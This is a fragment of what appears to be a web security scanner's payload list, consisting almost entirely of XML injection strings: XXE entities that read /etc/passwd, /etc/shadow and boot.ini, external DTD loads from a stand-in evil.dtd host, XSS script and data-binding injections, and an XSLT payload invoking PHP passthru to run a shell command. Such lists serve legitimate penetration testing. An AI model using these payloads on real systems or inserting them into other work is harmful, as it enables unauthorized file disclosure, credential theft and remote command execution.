        '<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"',
        "x' or name()='username' or 'x'='y",
        '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>',
        '<![CDATA[<test></test>]]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>',
        '<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>',
        '<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>',
        '<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>',
        '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>',
        '<?xml version=\'1.0\' standalone=\'no\'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">%f5a30; ]>',
        '<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>',
        '<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall>',
        '<?xml version="1.0" encoding="utf-16" standalone="yes"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://wordpress.org/</string></value></param><param><value><string>http://xerosecurity.com</string></value></param></params></methodCall>',
        '<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(\'XSS\')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>',
        '<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><methodCall><methodName>&xxe</methodName></methodCall>',
        '<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>',
        '<test></test>',
        '<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>',
        '"}}</script><script>alert(1);</script></body></html><!--',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>',
        '<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../boot.ini" ]> <change-log> <text>&systemEntity;</text>; </change-log>',
        "}}</script>'",
        '<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg>',
        '<xml SRC="https://crowdshield.com/.testing/xss.html" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>',
        '<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]>',
        '<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">',
        '<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>',
        "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>",
        "'}}</script>'",
        '<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]>',
        '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function(\'passthru\',\'ls -la\')"/></xsl:template></xsl:stylesheet>',
        '<xml SRC="xsstest.xml" ID=I></xml>',
        '<?xml version="1.0"?><change-log><text><script>alert(1)</script></text></change-log>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>',
        '<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>',
        '<xml SRC="https://crowdshield.com/.testing/rfi_vuln.txt" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >   <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>',
        '<?xml version="1.0"?><change-log><text>Hello World</text></change-log>',
        '<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>',
    ],
}
